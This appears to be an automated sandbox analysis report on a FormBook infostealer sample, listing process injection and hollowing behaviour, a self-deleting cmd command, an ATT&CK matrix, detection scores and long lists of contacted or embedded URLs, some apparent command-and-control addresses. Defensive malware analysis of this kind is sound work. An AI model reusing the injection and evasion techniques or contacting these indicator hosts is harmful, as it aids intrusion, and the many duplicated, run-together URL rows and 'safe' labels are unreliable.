Source: C:\Users\user\Desktop\PO45937008ADENGY.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write (2 occurrences)
Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe | Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\wlanext.exe | Thread register set: target process: 3424

Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe | Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe | Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: E50000

Source: C:\Users\user\Desktop\PO45937008ADENGY.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe | Process created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe (3 occurrences)
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO45937008ADENGY.exe'
Source: explorer.exe, 0000000C.00000002.914070199.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
Source: explorer.exe, 0000000C.00000002.915192555.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.916038112.0000000005F20000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 0000000C.00000002.915192555.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.916038112.0000000005F20000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000C.00000002.915192555.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.916038112.0000000005F20000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 0000000C.00000002.915192555.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.916038112.0000000005F20000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 0000000C.00000000.695029841.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe | Queries volume information: C:\Users\user\Desktop\PO45937008ADENGY.exe VolumeInformation
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

(Trailing digits after a technique name are the report's superscript signature references, kept as they appear on the page.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules1 | Path Interception | Process Injection512 | Masquerading1 | OS Credential Dumping | Security Software Discovery231 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion13 | LSASS Memory | Virtualization/Sandbox Evasion13 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection512 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol14 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information3 | Cached Domain Credentials | System Information Discovery112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Timestomp1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

Behavior Graph

[The behavior graph is an image on the original page; the data recoverable from its labels follows.]

Behavior Graph ID: 383974 | Sample: PO45937008ADENGY.exe | Start date: 08/04/2021 | Architecture: WINDOWS | Score: 100

Start node: www.softballlyfe.com; www.helpmewithmyenergy.com; 2 other IPs or domains. Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures.

PO45937008ADENGY.exe (started): 104.21.56.119, 443, 49727 CLOUDFLARENETUS United States; myliverpoolnews.cf 172.67.150.212, 49726, 80 CLOUDFLARENETUS United States. Signatures: Tries to detect virtualization through RDTSC time measurements; Hides threads from debuggers. Children: PO45937008ADENGY.exe; cmd.exe; WerFault.exe; 2 other processes.

PO45937008ADENGY.exe (child): Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection). Injects into explorer.exe.

cmd.exe: Children: conhost.exe; timeout.exe.

explorer.exe (injected): tuyensinhhaiphong.com 123.31.43.181, 49771, 80 VNPT-AS-VNVNPTCorpVN Viet Nam; onstatic-pt.setupdns.net 81.88.57.70, 49764, 80 REGISTER-ASIT Italy; 20 other IPs or domains. Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation. Child: wlanext.exe.

wlanext.exe: Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements. Child: cmd.exe, which starts conhost.exe.


          Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
PO45937008ADENGY.exe | 28% | Virustotal |
PO45937008ADENGY.exe | 25% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx
PO45937008ADENGY.exe | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
9.2.PO45937008ADENGY.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2

Domains

Source | Detection | Scanner | Label
onstatic-pt.setupdns.net | 0% | Virustotal |
thelandcle.com | 0% | Virustotal |
helpmewithmyenergy.com | 0% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://www.belatopapparel.xyz/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIuUu2jl9+pI7KEKz6GYJxWtv8ndSN9vJ | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818. | 0% | URL Reputation | safe (3 occurrences)
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg | 0% | URL Reputation | safe (3 occurrences)
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668 | 0% | URL Reputation | safe (3 occurrences)
http://www.bookitstaugustine.com/mb7q/?yN60IZO0=Eg9LmWGI0Oet516AxmsZzIGWmok4sinlIPDI718HGBMEwpQyo+2kUwjDddaGIg2fHcAS&1bhta6=SXxhAn0Xl | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02- | 0% | URL Reputation | safe (3 occurrences)
http://www.theskineditco.com/mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xl | 0% | Avira URL Cloud | safe
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837 | 0% | URL Reputation | safe (3 occurrences)
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690 | 0% | URL Reputation | safe (3 occurrences)
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803. | 0% | URL Reputation | safe (3 occurrences)
www.hnchotels.com/mb7q/ | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe (3 occurrences)
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe (3 occurrences)
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp | 0% | URL Reputation | safe (3 occurrences)
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03- | 0% | URL Reputation | safe (3 occurrences)
https://www.liverpool.com/all-about/premier-league | 0% | URL Reputation | safe (3 occurrences)
http://www.szmsbk.com/mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg | 0% | URL Reputation | safe (3 occurrences)
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png | 0% | URL Reputation | safe (3 occurrences)
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03- | 0% | URL Reputation | safe (3 occurrences)
https://www.liverpool.com/liverpool-fc-news/ | 0% | URL Reputation | safe (3 occurrences)
http://www.softballlyfe.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=ldDnDUdezTC7tPBp0C9FWPT+aIOp+kECAuOoWXdVRcKkjwO3/Dyrm4T044WIDM2icpCp | 0% | Avira URL Cloud | safe
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154 | 0% | URL Reputation | safe (3 occurrences)
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837. | 0% | URL Reputation | safe (3 occurrences)
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
          http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BCA8795F5D846C5CAD40FE94B65D663D.html0%Avira URL Cloudsafe
          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
          https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
          https://reachplc.hub.loginradius.com&quot;0%Avira URL Cloudsafe
          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
          https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%URL Reputationsafe

          Domains and IPs

          Contacted Domains


                                                          Contacted URLs


                                                          URLs from Memory and Binaries

                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp
Malicious: false
Reputation: high

https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp; PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166
Source: PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://reachplc.hub.loginradius.com"
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• Avira URL Cloud: safe
Reputation: low

https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp; PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown
https://www.liverpool.c
Source: PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp
Malicious: false
• Avira URL Cloud: safe
Reputation: unknown

https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp; PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

http://www.carterandcone.coml
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://felix.data.tm-awx.com/felix.min.js
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp
Malicious: false
Reputation: high

https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://myliverpoolnews.cf
Source: PO45937008ADENGY.exe, 00000000.00000002.710719071.0000000002E65000.00000004.00000001.sdmp
Malicious: false
• Avira URL Cloud: safe
Reputation: unknown

https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp; PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://www.liverpool.com/all-about/ozan-kabak
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp; PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://s2-prod.mirror.co.uk/
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-
Source: PO45937008ADENGY.exe, 00000000.00000002.710098516.0000000002DF1000.00000004.00000001.sdmp
Malicious: false
• Avira URL Cloud: safe
Reputation: unknown

https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://www.liverpool.com/all-about/champions-league
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://www.liverpool.com/all-about/curtis-user
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp; PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://www.liverpool.com/all-about/steven-gerrard
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown
https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
Source: PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

http://schema.org/NewsArticle
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
Reputation: high

http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp
Malicious: false
Reputation: high

https://www.liverpool.com/schedule/
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

http://schema.org/BreadcrumbList
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
Reputation: high

http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp
Malicious: false
Reputation: high

http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

https://securepubads.g.doubleclick.net/tag/js/gpt.js
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
Reputation: high

http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp
Malicious: false
Reputation: high

https://s2-prod.liverpool.com/
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown

http://www.tiro.com
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp
Malicious: false
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
Reputation: unknown
